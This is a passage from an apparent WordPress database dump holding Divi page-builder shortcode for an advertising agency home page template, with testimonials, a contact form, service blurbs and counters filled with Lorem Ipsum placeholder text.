portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:48:38','2020-07-04 21:48:38','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(181,1,'2020-07-04 21:51:21','2020-07-04 21:51:21','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"55px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" hover_enabled=\"0\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" animation_duration=\"1200ms\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section 